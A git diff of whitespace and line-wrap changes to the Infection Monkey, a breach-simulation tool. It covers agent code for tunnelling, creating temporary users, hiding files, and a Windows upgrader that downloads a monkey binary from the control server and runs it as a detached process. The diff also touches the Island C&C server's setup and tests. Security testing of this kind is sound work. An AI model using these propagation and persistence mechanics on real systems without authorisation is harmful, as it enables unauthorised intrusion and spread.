answer = "%s:%d" % (ip_match, self.local_port)
LOG.debug(
- "Got tunnel request from %s, answering with %s", address[0], answer
+ "Got tunnel request from %s, answering with %s", address[0], answer
)
self._broad_sock.sendto(answer.encode(), (address[0], MCAST_PORT))
elif b"+" == search:
@@ -173,7 +173,8 @@ class MonkeyTunnel(Thread):
LOG.info("Stopping tunnel, waiting for clients: %s" % repr(self._clients))
- # wait till all of the tunnel clients has been disconnected, or no one used the tunnel in QUIT_TIMEOUT seconds
+ # wait till all of the tunnel clients has been disconnected, or no one used the tunnel in
+ # QUIT_TIMEOUT seconds
while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT):
try:
search, address = self._broad_sock.recvfrom(BUFFER_READ)
diff --git a/monkey/infection_monkey/utils/auto_new_user.py b/monkey/infection_monkey/utils/auto_new_user.py
index 26c1c837c..f3ebda0af 100644
--- a/monkey/infection_monkey/utils/auto_new_user.py
+++ b/monkey/infection_monkey/utils/auto_new_user.py
@@ -8,8 +8,10 @@ class AutoNewUser(metaclass=abc.ABCMeta):
"""
RAII object to use for creating and using a new user. Use with `with`.
User will be created when the instance is instantiated.
- User will be available for use (log on for Windows, for example) at the start of the `with` scope.
- User will be removed (deactivated and deleted for Windows, for example) at the end of said `with` scope.
+ User will be available for use (log on for Windows, for example) at the start of the `with`
+ scope.
+ User will be removed (deactivated and deleted for Windows, for example) at the end of said
+ `with` scope.
Example:
# Created # Logged on
diff --git a/monkey/infection_monkey/utils/auto_new_user_factory.py b/monkey/infection_monkey/utils/auto_new_user_factory.py
index 898226d46..22c57c578 100644
--- a/monkey/infection_monkey/utils/auto_new_user_factory.py
+++ b/monkey/infection_monkey/utils/auto_new_user_factory.py
@@ -5,13 +5,15 @@ from infection_monkey.utils.windows.users import AutoNewWindowsUser
def create_auto_new_user(username, password, is_windows=is_windows_os()):
"""
- Factory method for creating an AutoNewUser. See AutoNewUser's documentation for more information.
+ Factory method for creating an AutoNewUser. See AutoNewUser's documentation for more
+ information.
Example usage:
with create_auto_new_user(username, PASSWORD) as new_user:
...
:param username: The username of the new user.
:param password: The password of the new user.
- :param is_windows: If True, a new Windows user is created. Otherwise, a Linux user is created. Leave blank for
+ :param is_windows: If True, a new Windows user is created. Otherwise, a Linux user is
+ created. Leave blank for
automatic detection.
:return: The new AutoNewUser object - use with a `with` scope.
"""
diff --git a/monkey/infection_monkey/utils/hidden_files.py b/monkey/infection_monkey/utils/hidden_files.py
index cc973cc5e..335619ab4 100644
--- a/monkey/infection_monkey/utils/hidden_files.py
+++ b/monkey/infection_monkey/utils/hidden_files.py
@@ -27,8 +27,8 @@ def get_commands_to_hide_folders():
def cleanup_hidden_files(is_windows=is_windows_os()):
subprocess.run(
- get_windows_commands_to_delete()
- if is_windows # noqa: DUO116
- else " ".join(get_linux_commands_to_delete()),
- shell=True,
+ get_windows_commands_to_delete()
+ if is_windows # noqa: DUO116
+ else " ".join(get_linux_commands_to_delete()),
+ shell=True,
)
diff --git a/monkey/infection_monkey/utils/linux/users.py b/monkey/infection_monkey/utils/linux/users.py
index 9144a24ec..a2ece7df8 100644
--- a/monkey/infection_monkey/utils/linux/users.py
+++ b/monkey/infection_monkey/utils/linux/users.py
@@ -14,7 +14,8 @@ def get_linux_commands_to_add_user(username):
"-M", # Do not create homedir
"--expiredate", # The date on which the user account will be disabled.
datetime.datetime.today().strftime("%Y-%m-%d"),
- "--inactive", # The number of days after a password expires until the account is permanently disabled.
+ "--inactive",
+ # The number of days after a password expires until the account is permanently disabled.
"0", # A value of 0 disables the account as soon as the password has expired
"-c", # Comment
"MONKEY_USER", # Comment
@@ -40,10 +41,10 @@ class AutoNewLinuxUser(AutoNewUser):
commands_to_add_user = get_linux_commands_to_add_user(username)
logger.debug(
- "Trying to add {} with commands {}".format(self.username, str(commands_to_add_user))
+ "Trying to add {} with commands {}".format(self.username, str(commands_to_add_user))
)
_ = subprocess.check_output(
- " ".join(commands_to_add_user), stderr=subprocess.STDOUT, shell=True
+ " ".join(commands_to_add_user), stderr=subprocess.STDOUT, shell=True
)
def __enter__(self):
@@ -51,7 +52,7 @@ class AutoNewLinuxUser(AutoNewUser):
def run_as(self, command):
command_as_new_user = "sudo -u {username} {command}".format(
- username=self.username, command=command
+ username=self.username, command=command
)
return os.system(command_as_new_user)
@@ -59,10 +60,10 @@ class AutoNewLinuxUser(AutoNewUser):
# delete the user.
commands_to_delete_user = get_linux_commands_to_delete_user(self.username)
logger.debug(
- "Trying to delete {} with commands {}".format(
- self.username, str(commands_to_delete_user)
- )
+ "Trying to delete {} with commands {}".format(
+ self.username, str(commands_to_delete_user)
+ )
)
_ = subprocess.check_output(
- " ".join(commands_to_delete_user), stderr=subprocess.STDOUT, shell=True
+ " ".join(commands_to_delete_user), stderr=subprocess.STDOUT, shell=True
)
diff --git a/monkey/infection_monkey/utils/plugins/plugin.py b/monkey/infection_monkey/utils/plugins/plugin.py
index f72585cd3..a37b1674a 100644
--- a/monkey/infection_monkey/utils/plugins/plugin.py
+++ b/monkey/infection_monkey/utils/plugins/plugin.py
@@ -33,7 +33,7 @@ class Plugin(metaclass=ABCMeta):
objects = []
candidate_files = _get_candidate_files(cls.base_package_file())
LOG.info(
- "looking for classes of type {} in {}".format(cls.__name__, cls.base_package_name())
+ "looking for classes of type {} in {}".format(cls.__name__, cls.base_package_name())
)
# Go through all of files
for file in candidate_files:
@@ -55,9 +55,9 @@ class Plugin(metaclass=ABCMeta):
LOG.debug("Added {} to list".format(class_object.__name__))
except Exception as e:
LOG.warning(
- "Exception {} when checking if {} should run".format(
- str(e), class_object.__name__
- )
+ "Exception {} when checking if {} should run".format(
+ str(e), class_object.__name__
+ )
)
return objects
@@ -76,7 +76,7 @@ class Plugin(metaclass=ABCMeta):
instances.append(instance)
except Exception as e:
LOG.warning(
- "Exception {} when initializing {}".format(str(e), class_object.__name__)
+ "Exception {} when initializing {}".format(str(e), class_object.__name__)
)
return instances
diff --git a/monkey/infection_monkey/utils/windows/hidden_files.py b/monkey/infection_monkey/utils/windows/hidden_files.py
index 818c88a6e..55e22d6ac 100644
--- a/monkey/infection_monkey/utils/windows/hidden_files.py
+++ b/monkey/infection_monkey/utils/windows/hidden_files.py
@@ -53,13 +53,13 @@ def get_winAPI_to_hide_files():
fileFlags = win32file.FILE_ATTRIBUTE_HIDDEN # make hidden
win32file.CreateFile(
- HIDDEN_FILE_WINAPI,
- fileAccess,
- 0, # sharing mode: 0 => can't be shared
- None, # security attributes
- fileCreation,
- fileFlags,
- 0,
+ HIDDEN_FILE_WINAPI,
+ fileAccess,
+ 0, # sharing mode: 0 => can't be shared
+ None, # security attributes
+ fileCreation,
+ fileFlags,
+ 0,
) # template file
return "Succesfully created hidden file: {}".format(HIDDEN_FILE_WINAPI), True
diff --git a/monkey/infection_monkey/utils/windows/users.py b/monkey/infection_monkey/utils/windows/users.py
index 9e5913673..8178d75df 100644
--- a/monkey/infection_monkey/utils/windows/users.py
+++ b/monkey/infection_monkey/utils/windows/users.py
@@ -47,13 +47,15 @@ class AutoNewWindowsUser(AutoNewUser):
import win32security
try:
- # Logon as new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera
+ # Logon as new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf
+ # -winbase-logonusera
self.logon_handle = win32security.LogonUser(
- self.username,
- ".", # Use current domain.
- self.password,
- win32con.LOGON32_LOGON_INTERACTIVE, # Logon type - interactive (normal user), since we're using a shell.
- win32con.LOGON32_PROVIDER_DEFAULT,
+ self.username,
+ ".", # Use current domain.
+ self.password,
+ win32con.LOGON32_LOGON_INTERACTIVE,
+ # Logon type - interactive (normal user), since we're using a shell.
+ win32con.LOGON32_PROVIDER_DEFAULT,
) # Which logon provider to use - whatever Windows offers.
except Exception as err:
raise NewUserError("Can't logon as {}. Error: {}".format(self.username, str(err)))
@@ -74,20 +76,25 @@ class AutoNewWindowsUser(AutoNewUser):
# Open process as that user
# https://github.com/tjguk/winsys/blob/master/winsys/_advapi32.py
proc_info = _advapi32.CreateProcessWithLogonW(
- username=self.username, domain=".", password=self.password, command_line=command
+ username=self.username, domain=".", password=self.password, command_line=command
)
process_handle = proc_info.hProcess
thread_handle = proc_info.hThread
logger.debug(
- "Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS)
+ "Waiting for process to finish. Timeout: {}ms".format(
+ WAIT_TIMEOUT_IN_MILLISECONDS)
)
- # https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f-408d2a41750d/what-events-on-a-process-handle-signal-satisify-waitforsingleobject?forum=vcgeneral
- # Ignoring return code, as we'll use `GetExitCode` to determine the state of the process later.
- _ = win32event.WaitForSingleObject( # Waits until the specified object is signaled, or time-out.
- process_handle, # Ping process handle
- WAIT_TIMEOUT_IN_MILLISECONDS, # Timeout in milliseconds
+ # https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f
+ # -408d2a41750d/what-events-on-a-process-handle-signal-satisify-waitforsingleobject
+ # ?forum=vcgeneral
+ # Ignoring return code, as we'll use `GetExitCode` to determine the state of the
+ # process later.
+ _ = win32event.WaitForSingleObject(
+ # Waits until the specified object is signaled, or time-out.
+ process_handle, # Ping process handle
+ WAIT_TIMEOUT_IN_MILLISECONDS, # Timeout in milliseconds
)
exit_code = win32process.GetExitCodeProcess(process_handle)
@@ -117,12 +124,12 @@ class AutoNewWindowsUser(AutoNewUser):
try:
commands_to_deactivate_user = get_windows_commands_to_deactivate_user(self.username)
logger.debug(
- "Trying to deactivate {} with commands {}".format(
- self.username, str(commands_to_deactivate_user)
- )
+ "Trying to deactivate {} with commands {}".format(
+ self.username, str(commands_to_deactivate_user)
+ )
)
_ = subprocess.check_output(
- commands_to_deactivate_user, stderr=subprocess.STDOUT, shell=True
+ commands_to_deactivate_user, stderr=subprocess.STDOUT, shell=True
)
except Exception as err:
raise NewUserError("Can't deactivate user {}. Info: {}".format(self.username, err))
@@ -131,12 +138,12 @@ class AutoNewWindowsUser(AutoNewUser):
try:
commands_to_delete_user = get_windows_commands_to_delete_user(self.username)
logger.debug(
- "Trying to delete {} with commands {}".format(
- self.username, str(commands_to_delete_user)
- )
+ "Trying to delete {} with commands {}".format(
+ self.username, str(commands_to_delete_user)
+ )
)
_ = subprocess.check_output(
- commands_to_delete_user, stderr=subprocess.STDOUT, shell=True
+ commands_to_delete_user, stderr=subprocess.STDOUT, shell=True
)
except Exception as err:
raise NewUserError("Can't delete user {}. Info: {}".format(self.username, err))
diff --git a/monkey/infection_monkey/windows_upgrader.py b/monkey/infection_monkey/windows_upgrader.py
index cea71a326..697321577 100644
--- a/monkey/infection_monkey/windows_upgrader.py
+++ b/monkey/infection_monkey/windows_upgrader.py
@@ -34,7 +34,7 @@ class WindowsUpgrader(object):
monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False)
with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file:
with open(
- WormConfiguration.dropper_target_path_win_64, "wb"
+ WormConfiguration.dropper_target_path_win_64, "wb"
) as written_monkey_file:
shutil.copyfileobj(downloaded_monkey_file, written_monkey_file)
except (IOError, AttributeError) as e:
@@ -42,28 +42,29 @@ class WindowsUpgrader(object):
return
monkey_options = build_monkey_commandline_explicitly(
- opts.parent, opts.tunnel, opts.server, opts.depth
+ opts.parent, opts.tunnel, opts.server, opts.depth
)
monkey_cmdline = (
- MONKEY_CMDLINE_WINDOWS % {"monkey_path": WormConfiguration.dropper_target_path_win_64}
- + monkey_options
+ MONKEY_CMDLINE_WINDOWS % {
+ "monkey_path":WormConfiguration.dropper_target_path_win_64}
+ + monkey_options
)
monkey_process = subprocess.Popen(
- monkey_cmdline,
- shell=True,
- stdin=None,
- stdout=None,
- stderr=None,
- close_fds=True,
- creationflags=DETACHED_PROCESS,
+ monkey_cmdline,
+ shell=True,
+ stdin=None,
+ stdout=None,
+ stderr=None,
+ close_fds=True,
+ creationflags=DETACHED_PROCESS,
)
LOG.info(
- "Executed 64bit monkey process (PID=%d) with command line: %s",
- monkey_process.pid,
- monkey_cmdline,
+ "Executed 64bit monkey process (PID=%d) with command line: %s",
+ monkey_process.pid,
+ monkey_cmdline,
)
time.sleep(WindowsUpgrader.__UPGRADE_WAIT_TIME__)
diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py
index b06494c21..bbd06b9a7 100644
--- a/monkey/monkey_island/cc/app.py
+++ b/monkey/monkey_island/cc/app.py
@@ -62,13 +62,15 @@ def serve_static_file(static_path):
try:
return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, "cc/ui/dist"), static_path)
except NotFound:
- # Because react uses various urls for same index page, this is probably the user's intention.
+ # Because react uses various urls for same index page, this is probably the user's
+ # intention.
if static_path == HOME_FILE:
flask_restful.abort(
- Response(
- "Page not found. Make sure you ran the npm script and the cwd is monkey\\monkey.",
- 500,
- )
+ Response(
+ "Page not found. Make sure you ran the npm script and the cwd is "
+ "monkey\\monkey.",
+ 500,
+ )
)
return serve_home()
@@ -82,11 +84,13 @@ def init_app_config(app, mongo_url):
# See https://flask-jwt-extended.readthedocs.io/en/stable/options
app.config["JWT_ACCESS_TOKEN_EXPIRES"] = env_singleton.env.get_auth_expiration_time()
- # Invalidate the signature of JWTs if the server process restarts. This avoids the edge case of getting a JWT,
+ # Invalidate the signature of JWTs if the server process restarts. This avoids the edge case
+ # of getting a JWT,
# deciding to reset credentials and then still logging in with the old JWT.
app.config["JWT_SECRET_KEY"] = str(uuid.uuid4())
- # By default, Flask sorts keys of JSON objects alphabetically, which messes with the ATT&CK matrix in the
+ # By default, Flask sorts keys of JSON objects alphabetically, which messes with the ATT&CK
+ # matrix in the
# configuration. See https://flask.palletsprojects.com/en/1.1.x/config/#JSON_SORT_KEYS.
app.config["JSON_SORT_KEYS"] = False
@@ -101,7 +105,8 @@ def init_app_services(app):
database.init()
Database.init_db()
- # If running on AWS, this will initialize the instance data, which is used "later" in the execution of the island.
+ # If running on AWS, this will initialize the instance data, which is used "later" in the
+ # execution of the island.
RemoteRunAwsService.init()
@@ -120,15 +125,15 @@ def init_api_resources(api):
api.add_resource(LocalRun, "/api/local-monkey", "/api/local-monkey/")
api.add_resource(ClientRun, "/api/client-monkey", "/api/client-monkey/")
api.add_resource(
- Telemetry, "/api/telemetry", "/api/telemetry/", "/api/telemetry/"
+ Telemetry, "/api/telemetry", "/api/telemetry/", "/api/telemetry/"
)
api.add_resource(MonkeyConfiguration, "/api/configuration", "/api/configuration/")
api.add_resource(IslandConfiguration, "/api/configuration/island", "/api/configuration/island/")
api.add_resource(
- MonkeyDownload,
- "/api/monkey/download",
- "/api/monkey/download/",
- "/api/monkey/download/",
+ MonkeyDownload,
+ "/api/monkey/download",
+ "/api/monkey/download/",
+ "/api/monkey/download/",
)
api.add_resource(NetMap, "/api/netmap", "/api/netmap/")
api.add_resource(Edge, "/api/netmap/edge", "/api/netmap/edge/")
@@ -146,10 +151,10 @@ def init_api_resources(api):
api.add_resource(PBAFileDownload, "/api/pba/download/")
api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH)
api.add_resource(
- FileUpload,
- "/api/fileUpload/",
- "/api/fileUpload/?load=",
- "/api/fileUpload/?restore=",
+ FileUpload,
+ "/api/fileUpload/",
+ "/api/fileUpload/?load=",
+ "/api/fileUpload/?restore=",
)
api.add_resource(RemoteRun, "/api/remote-monkey", "/api/remote-monkey/")
api.add_resource(AttackConfiguration, "/api/attack")
@@ -170,7 +175,7 @@ def init_app(mongo_url):
app = Flask(__name__)
api = flask_restful.Api(app)
- api.representations = {"application/json": output_json}
+ api.representations = {"application/json":output_json}
init_app_config(app, mongo_url)
init_app_services(app)
diff --git a/monkey/monkey_island/cc/arg_parser.py b/monkey/monkey_island/cc/arg_parser.py
index 91a2b7d25..3785b01b1 100644
--- a/monkey/monkey_island/cc/arg_parser.py
+++ b/monkey/monkey_island/cc/arg_parser.py
@@ -17,28 +17,28 @@ def parse_cli_args() -> IslandArgs:
import argparse
parser = argparse.ArgumentParser(
- description="Infection Monkey Island CnC Server. See https://infectionmonkey.com",
- formatter_class=argparse.ArgumentDefaultsHelpFormatter,
+ description="Infection Monkey Island CnC Server. See https://infectionmonkey.com",
+ formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
- "-s",
- "--setup-only",
- action="store_true",
- help="Pass this flag to cause the Island to setup and exit without actually starting. "
- "This is useful for preparing Island to boot faster later-on, so for "
- "compiling/packaging Islands.",
+ "-s",
+ "--setup-only",
+ action="store_true",
+ help="Pass this flag to cause the Island to setup and exit without actually starting. "
+ "This is useful for preparing Island to boot faster later-on, so for "
+ "compiling/packaging Islands.",
)
parser.add_argument(
- "--server-config",
- action="store",
- help="The path to the server configuration file.",
- default=DEFAULT_SERVER_CONFIG_PATH,
+ "--server-config",
+ action="store",
+ help="The path to the server configuration file.",
+ default=DEFAULT_SERVER_CONFIG_PATH,
)
parser.add_argument(
- "--logger-config",
- action="store",
- help="The path to the logging configuration file.",
- default=DEFAULT_LOGGER_CONFIG_PATH,
+ "--logger-config",
+ action="store",
+ help="The path to the logging configuration file.",
+ default=DEFAULT_LOGGER_CONFIG_PATH,
)
args = parser.parse_args()
diff --git a/monkey/monkey_island/cc/environment/__init__.py b/monkey/monkey_island/cc/environment/__init__.py
index 612428428..4d04b70ee 100644
--- a/monkey/monkey_island/cc/environment/__init__.py
+++ b/monkey/monkey_island/cc/environment/__init__.py
@@ -23,8 +23,8 @@ class Environment(object, metaclass=ABCMeta):
_MONGO_DB_HOST = "localhost"
_MONGO_DB_PORT = 27017
_MONGO_URL = os.environ.get(
- "MONKEY_MONGO_URL",
- "mongodb://{0}:{1}/{2}".format(_MONGO_DB_HOST, _MONGO_DB_PORT, str(_MONGO_DB_NAME)),
+ "MONKEY_MONGO_URL",
+ "mongodb://{0}:{1}/{2}".format(_MONGO_DB_HOST, _MONGO_DB_PORT, str(_MONGO_DB_NAME)),
)
_DEBUG_SERVER = False
_AUTH_EXPIRATION_TIME = timedelta(minutes=30)
@@ -62,12 +62,12 @@ class Environment(object, metaclass=ABCMeta):
def _try_needs_registration(self) -> bool:
if not self._credentials_required:
raise CredentialsNotRequiredError(
- "Credentials are not required " "for current environment."
+ "Credentials are not required " "for current environment."
)
else:
if self._is_registered():
raise AlreadyRegisteredError(
- "User has already been registered. " "Reset credentials or login."
+ "User has already been registered. " "Reset credentials or login."
)
return True
diff --git a/monkey/monkey_island/cc/environment/aws.py b/monkey/monkey_island/cc/environment/aws.py
index 89e7b428d..c11e40436 100644
--- a/monkey/monkey_island/cc/environment/aws.py
+++ b/monkey/monkey_island/cc/environment/aws.py
@@ -5,7 +5,6 @@ __author__ = "itay.mizeretz"
class AwsEnvironment(Environment):
-
_credentials_required = True
def __init__(self, config):
diff --git a/monkey/monkey_island/cc/environment/environment_config.py b/monkey/monkey_island/cc/environment/environment_config.py
index 70d27e546..2a5a02cfc 100644
--- a/monkey/monkey_island/cc/environment/environment_config.py
+++ b/monkey/monkey_island/cc/environment/environment_config.py
@@ -58,12 +58,12 @@ class EnvironmentConfig:
def to_dict(self) -> Dict:
config_dict = {
- "server_config": self.server_config,
- "deployment": self.deployment,
- "data_dir": self.data_dir,
+ "server_config":self.server_config,
+ "deployment":self.deployment,
+ "data_dir":self.data_dir,
}
if self.aws:
- config_dict.update({"aws": self.aws})
+ config_dict.update({"aws":self.aws})
config_dict.update(self.user_creds.to_dict())
return config_dict
diff --git a/monkey/monkey_island/cc/environment/environment_singleton.py b/monkey/monkey_island/cc/environment/environment_singleton.py
index e7e316ac5..695a4d393 100644
--- a/monkey/monkey_island/cc/environment/environment_singleton.py
+++ b/monkey/monkey_island/cc/environment/environment_singleton.py
@@ -13,9 +13,9 @@ STANDARD = "standard"
PASSWORD = "password"
ENV_DICT = {
- STANDARD: standard.StandardEnvironment,
- AWS: aws.AwsEnvironment,
- PASSWORD: password.PasswordEnvironment,
+ STANDARD:standard.StandardEnvironment,
+ AWS:aws.AwsEnvironment,
+ PASSWORD:password.PasswordEnvironment,
}
env = None
diff --git a/monkey/monkey_island/cc/environment/password.py b/monkey/monkey_island/cc/environment/password.py
index 88d1f76f0..4a8a6d855 100644
--- a/monkey/monkey_island/cc/environment/password.py
+++ b/monkey/monkey_island/cc/environment/password.py
@@ -4,7 +4,6 @@ __author__ = "itay.mizeretz"
class PasswordEnvironment(Environment):
-
_credentials_required = True
def get_auth_users(self):
diff --git a/monkey/monkey_island/cc/environment/standard.py b/monkey/monkey_island/cc/environment/standard.py
index 8135e8e3f..35ca84a34 100644
--- a/monkey/monkey_island/cc/environment/standard.py
+++ b/monkey/monkey_island/cc/environment/standard.py
@@ -5,7 +5,6 @@ __author__ = "itay.mizeretz"
class StandardEnvironment(Environment):
-
_credentials_required = False
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
diff --git a/monkey/monkey_island/cc/environment/test__init__.py b/monkey/monkey_island/cc/environment/test__init__.py
index dbf98eefe..fbb23335f 100644
--- a/monkey/monkey_island/cc/environment/test__init__.py
+++ b/monkey/monkey_island/cc/environment/test__init__.py
@@ -19,7 +19,7 @@ WITH_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_with_credenti
NO_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_no_credentials.json")
PARTIAL_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_partial_credentials.json")
STANDARD_WITH_CREDENTIALS = os.path.join(
- TEST_RESOURCES_DIR, "server_config_standard_with_credentials.json"
+ TEST_RESOURCES_DIR, "server_config_standard_with_credentials.json"
)
STANDARD_ENV = os.path.join(TEST_RESOURCES_DIR, "server_config_standard_env.json")
@@ -132,7 +132,7 @@ class TestEnvironment(TestCase):
self._test_bool_env_method("_is_credentials_set_up", env, STANDARD_ENV, False)
def _test_bool_env_method(
- self, method_name: str, env: Environment, config: Dict, expected_result: bool
+ self, method_name: str, env: Environment, config: Dict, expected_result: bool
):
env._config = EnvironmentConfig(config)
method = getattr(env, method_name)
diff --git a/monkey/monkey_island/cc/environment/test_environment_config.py b/monkey/monkey_island/cc/environment/test_environment_config.py
index 9bf6bfc2b..d758fe69a 100644
--- a/monkey/monkey_island/cc/environment/test_environment_config.py
+++ b/monkey/monkey_island/cc/environment/test_environment_config.py
@@ -14,7 +14,7 @@ WITH_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_with_credenti
NO_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_no_credentials.json")
PARTIAL_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_partial_credentials.json")
STANDARD_WITH_CREDENTIALS = os.path.join(
- TEST_RESOURCES_DIR, "server_config_standard_with_credentials.json"
+ TEST_RESOURCES_DIR, "server_config_standard_with_credentials.json"
)
WITH_DATA_DIR = os.path.join(TEST_RESOURCES_DIR, "server_config_with_data_dir.json")
WITH_DATA_DIR_HOME = os.path.join(TEST_RESOURCES_DIR, "server_config_with_data_dir_home.json")
diff --git a/monkey/monkey_island/cc/environment/test_user_creds.py b/monkey/monkey_island/cc/environment/test_user_creds.py
index 93da16e24..e4764930f 100644
--- a/monkey/monkey_island/cc/environment/test_user_creds.py
+++ b/monkey/monkey_island/cc/environment/test_user_creds.py
@@ -9,13 +9,13 @@ class TestUserCreds(TestCase):
self.assertDictEqual(user_creds.to_dict(), {})
user_creds = UserCreds(username="Test")
- self.assertDictEqual(user_creds.to_dict(), {"user": "Test"})
+ self.assertDictEqual(user_creds.to_dict(), {"user":"Test"})
user_creds = UserCreds(password_hash="abc1231234")
- self.assertDictEqual(user_creds.to_dict(), {"password_hash": "abc1231234"})
+ self.assertDictEqual(user_creds.to_dict(), {"password_hash":"abc1231234"})
user_creds = UserCreds(username="Test", password_hash="abc1231234")
- self.assertDictEqual(user_creds.to_dict(), {"user": "Test", "password_hash": "abc1231234"})
+ self.assertDictEqual(user_creds.to_dict(), {"user":"Test", "password_hash":"abc1231234"})
def test_to_auth_user(self):
user_creds = UserCreds(username="Test", password_hash="abc1231234")
diff --git a/monkey/monkey_island/cc/environment/testing.py b/monkey/monkey_island/cc/environment/testing.py
index 2dd34a920..efa323fe8 100644
--- a/monkey/monkey_island/cc/environment/testing.py
+++ b/monkey/monkey_island/cc/environment/testing.py
@@ -4,7 +4,8 @@ from monkey_island.cc.environment import Environment, EnvironmentConfig
class TestingEnvironment(Environment):
"""
Use this environment for running Unit Tests.
- This will cause all mongo connections to happen via `mongomock` instead of using an actual mongodb instance.
+ This will cause all mongo connections to happen via `mongomock` instead of using an actual
+ mongodb instance.
"""
_credentials_required = True
diff --git a/monkey/monkey_island/cc/environment/user_creds.py b/monkey/monkey_island/cc/environment/user_creds.py
index 98a23a14a..c166802a3 100644
--- a/monkey/monkey_island/cc/environment/user_creds.py
+++ b/monkey/monkey_island/cc/environment/user_creds.py
@@ -17,9 +17,9 @@ class UserCreds:
def to_dict(self) -> Dict:
cred_dict = {}
if self.username:
- cred_dict.update({"user": self.username})
+ cred_dict.update({"user":self.username})
if self.password_hash:
- cred_dict.update({"password_hash": self.password_hash})
+ cred_dict.update({"password_hash":self.password_hash})
return cred_dict
def to_auth_user(self) -> User:
diff --git a/monkey/monkey_island/cc/main.py b/monkey/monkey_island/cc/main.py
index 75d105f70..3461f3c42 100644
--- a/monkey/monkey_island/cc/main.py
+++ b/monkey/monkey_island/cc/main.py
@@ -5,7 +5,8 @@ import time
from pathlib import Path
from threading import Thread
-# Add the monkey_island directory to the path, to make sure imports that don't start with "monkey_island." work.
+# Add the monkey_island directory to the path, to make sure imports that don't start with
+# "monkey_island." work.
from gevent.pywsgi import WSGIServer
MONKEY_ISLAND_DIR_BASE_PATH = str(Path(__file__).parent.parent)
@@ -39,7 +40,7 @@ def main(should_setup_only=False, server_config_filename=DEFAULT_SERVER_CONFIG_P
mongo_url = os.environ.get("MONGO_URL", env_singleton.env.get_mongo_url())
bootloader_server_thread = Thread(
- target=BootloaderHttpServer(mongo_url).serve_forever, daemon=True
+ target=BootloaderHttpServer(mongo_url).serve_forever, daemon=True
)
bootloader_server_thread.start()
@@ -48,7 +49,6 @@ def main(should_setup_only=False, server_config_filename=DEFAULT_SERVER_CONFIG_P
def start_island_server(should_setup_only):
-
mongo_url = os.environ.get("MONGO_URL", env_singleton.env.get_mongo_url())
wait_for_mongo_db_server(mongo_url)
assert_mongo_db_version(mongo_url)
@@ -69,10 +69,10 @@ def start_island_server(should_setup_only):
app.run(host="0.0.0.0", debug=True, ssl_context=(crt_path, key_path))
else:
http_server = WSGIServer(
- ("0.0.0.0", env_singleton.env.get_island_port()),
- app,
- certfile=os.environ.get("SERVER_CRT", crt_path),
- keyfile=os.environ.get("SERVER_KEY", key_path),
+ ("0.0.0.0", env_singleton.env.get_island_port()),
+ app,
+ certfile=os.environ.get("SERVER_CRT", crt_path),
+ keyfile=os.environ.get("SERVER_KEY", key_path),
)
log_init_info()
http_server.serve_forever()
@@ -82,14 +82,14 @@ def log_init_info():
logger.info("Monkey Island Server is running!")
logger.info(f"version: {get_version()}")
logger.info(
- "Listening on the following URLs: {}".format(
- ", ".join(
- [
- "https://{}:{}".format(x, env_singleton.env.get_island_port())
- for x in local_ip_addresses()
- ]
+ "Listening on the following URLs: {}".format(
+ ", ".join(
+ [
+ "https://{}:{}".format(x, env_singleton.env.get_island_port())
+ for x in local_ip_addresses()
+ ]
+ )
)
- )
)
MonkeyDownload.log_executable_hashes()
@@ -110,9 +110,9 @@ def assert_mongo_db_version(mongo_url):
server_version = get_db_version(mongo_url)
if server_version < required_version:
logger.error(
- "Mongo DB version too old. {0} is required, but got {1}".format(
- str(required_version), str(server_version)
- )
+ "Mongo DB version too old. {0} is required, but got {1}".format(
+ str(required_version), str(server_version)
+ )
)
sys.exit(-1)
else:
diff --git a/monkey/monkey_island/cc/models/__init__.py b/monkey/monkey_island/cc/models/__init__.py
index c668be7ae..1beccd40d 100644
--- a/monkey/monkey_island/cc/models/__init__.py
+++ b/monkey/monkey_island/cc/models/__init__.py
@@ -4,7 +4,8 @@ import monkey_island.cc.environment.environment_singleton as env_singleton
from .command_control_channel import CommandControlChannel # noqa: F401
-# Order of importing matters here, for registering the embedded and referenced documents before using them.
+# Order of importing matters here, for registering the embedded and referenced documents before
+# using them.
from .config import Config # noqa: F401
from .creds import Creds # noqa: F401
from .monkey import Monkey # noqa: F401
@@ -12,7 +13,7 @@ from .monkey_ttl import MonkeyTtl # noqa: F401
from .pba_results import PbaResults # noqa: F401
connect(
- db=env_singleton.env.mongo_db_name,
- host=env_singleton.env.mongo_db_host,
- port=env_singleton.env.mongo_db_port,
+ db=env_singleton.env.mongo_db_name,
+ host=env_singleton.env.mongo_db_host,
+ port=env_singleton.env.mongo_db_port,
)
diff --git a/monkey/monkey_island/cc/models/attack/attack_mitigations.py b/monkey/monkey_island/cc/models/attack/attack_mitigations.py
index 3df6b839d..2a4e8f70e 100644
--- a/monkey/monkey_island/cc/models/attack/attack_mitigations.py
+++ b/monkey/monkey_island/cc/models/attack/attack_mitigations.py
@@ -8,7 +8,6 @@ from monkey_island.cc.services.attack.test_mitre_api_interface import MitreApiIn
class AttackMitigations(Document):
-
COLLECTION_NAME = "attack_mitigations"
technique_id = StringField(required=True, primary_key=True)
@@ -39,13 +38,13 @@ class AttackMitigations(Document):
@staticmethod
def mitigations_from_attack_pattern(attack_pattern: AttackPattern):
return AttackMitigations(
- technique_id=MitreApiInterface.get_stix2_external_reference_id(attack_pattern),
- mitigations=[],
